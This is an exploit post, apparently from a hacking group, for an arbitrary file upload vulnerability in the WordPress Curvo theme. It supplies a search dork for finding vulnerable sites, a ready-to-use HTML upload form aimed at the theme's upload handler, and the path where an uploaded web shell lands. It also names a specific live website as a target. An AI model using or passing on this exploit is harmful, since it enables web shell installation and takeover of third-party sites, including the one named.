facebook facebook twitter rss

Wordpress Curvo Themes Vulnerability

Author: AnoaGhost , Published: 24-05-2015

Title : [New] Wordpress Curvo Themes File Upload Vulnerability
Author : AnoaGhost
Homepage : www.anon-coders.party
Tested On : Windows , Linux , Mobile , and etc

=========================

Dork : inurl:wp-content/themes/curvo_v1.4.3/

Poc : http://www.site.com/path/wp-content/themes/curvo_v1.4.3/functions/upload-handler.php

Exploit :
<form enctype="multipart/form-data"
action="http://www.site.com/path/wp-content/themes/curvo_v1.4.3/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" />
<input type="submit" value="upload" />
</form>

Shell access : site.com/wp-content/upload/[year]/[month]/shell.php

Target : www.polychemie.co.id/wp-content/themes/curvo_v1.4.3/functions/upload-handler.php

Greetz : Official Member of AnonCoders Team - Indonesian Security Tester - Indonesian Cyber Army - People Muslims - And You

Like us on Facebook :